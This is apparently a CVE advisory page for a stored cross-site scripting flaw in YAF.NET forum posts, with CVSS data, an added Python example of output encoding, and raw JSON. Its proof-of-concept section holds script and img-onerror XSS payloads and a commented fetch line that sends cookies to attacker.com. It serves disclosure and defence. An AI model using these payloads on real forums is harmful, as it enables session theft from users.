Security Vulnerability Report
CVE-2026-43939 CVSS 7.3 HIGH

CVE-2026-43939

Published: 2026-05-12 15:16:16
Last Modified: 2026-05-13 18:24:59

Description

YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5 and 3.2.12, the thread posting and reply feature accepts user-supplied content via a post or reply that is stored server-side and later rendered back into the thread page without adequate HTML sanitization or contextual output encoding. This vulnerability is fixed in 4.0.5 and 3.2.12.
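As an added illustration of the contextual output encoding the description says was missing, not code from YAF.NET or from the advisory: a Python sketch (chosen as a language-neutral demonstration; YAF.NET itself is C#) that stores posts as-is and decides at render time how to encode them for the HTML context they land in. The sample posts are constructed and reuse the two payload shapes quoted in the PoC section of this report; every function name here is this example's own.

```python
import html
import re

# Constructed sample rows, as they might sit in a posts table: one benign post
# and the two payload shapes quoted in the PoC section of this report.
STORED_POSTS = [
    'Welcome to the forum! Coffee & "code" at 9 < 10.',
    "<script>alert('XSS Vulnerability CVE-2026-43939 Exploited');</script>",
    "<img src=x onerror=alert('CVE-2026-43939')>",
]

# An unencoded "<" followed by a tag name is what turns text into markup;
# a lone "<" before a digit or space is just text to the HTML parser.
TAG_OPENER = re.compile(r"<\s*/?[A-Za-z]")
# Inline event-handler attribute; only dangerous inside a live tag.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def render_unencoded(post: str) -> str:
    """The failure mode in the description: stored text copied into the page."""
    return post


def encode_for_html_body(post: str) -> str:
    """Element-content context: & < > become entities; quotes may stay."""
    return html.escape(post, quote=False)


def encode_for_html_attribute(post: str) -> str:
    """Quoted-attribute context: quotes must be encoded too, otherwise the
    value can close the attribute and start a new one."""
    return html.escape(post, quote=True)


def contains_tag_opener(fragment: str) -> bool:
    """True if the fragment would start an element when parsed as HTML."""
    return TAG_OPENER.search(fragment) is not None


def breaks_out_of_attribute(fragment: str) -> bool:
    """True if the fragment could terminate a double-quoted attribute value."""
    return '"' in fragment


def thread_is_safe(posts, encoder) -> bool:
    """Every post, after the chosen encoder, is free of live tag openers."""
    return all(not contains_tag_opener(encoder(p)) for p in posts)


def render_thread(posts, encoder) -> str:
    """Build the thread page fragment, applying the encoder at output time
    (the point the advisory makes: encode on render, per context)."""
    return "\n".join(f'<div class="post-body">{encoder(p)}</div>' for p in posts)


def flag_for_review(posts) -> list:
    """Moderation-side check over stored rows: posts carrying raw markup or
    inline event handlers, worth a look even though encoding neutralises them."""
    return [p for p in posts if contains_tag_opener(p) or EVENT_HANDLER.search(p)]


if __name__ == "__main__":
    for name, enc in (("unencoded", render_unencoded),
                      ("body-encoded", encode_for_html_body)):
        print(f"{name}: thread safe = {thread_is_safe(STORED_POSTS, enc)}")
    print(render_thread(STORED_POSTS, encode_for_html_body))
    print("flagged for review:", flag_for_review(STORED_POSTS))
```

The body encoder is enough for element content, but the same text placed into a `title="..."` attribute needs the attribute encoder: `breaks_out_of_attribute` shows that the body-encoded benign post still carries a raw `"`, which is exactly why encoding has to be chosen per output context rather than once at storage time.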

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

YetAnotherForum.NET < 4.0.5
YetAnotherForum.NET < 3.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- Proof of Concept for CVE-2026-43939 Stored XSS -->
<!-- Step 1: Login as a low-privilege user -->
<!-- Step 2: Create a new post or reply with the following content -->
<script>
  // Malicious payload to demonstrate execution
  alert('XSS Vulnerability CVE-2026-43939 Exploited');
  // Example: Exfiltrate document cookies
  // fetch('https://attacker.com/log?c=' + encodeURIComponent(document.cookie));
</script>
<!-- Alternative payload if script tags are partially blocked but attributes are not -->
<img src=x onerror=alert('CVE-2026-43939')>
```

References

https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-43939",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T15:16:15.647",
    "lastModified": "2026-05-13T18:24:58.737",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5 and 3.2.12, the thread posting and reply feature accepts user-supplied content via a a post or reply that is stored server-side and later rendered back into the thread page without adequate HTML sanitization or contextual output encoding. This vulnerability is fixed in 4.0.5 and 3.2.12."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-80"},
          {"lang": "en", "value": "CWE-116"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```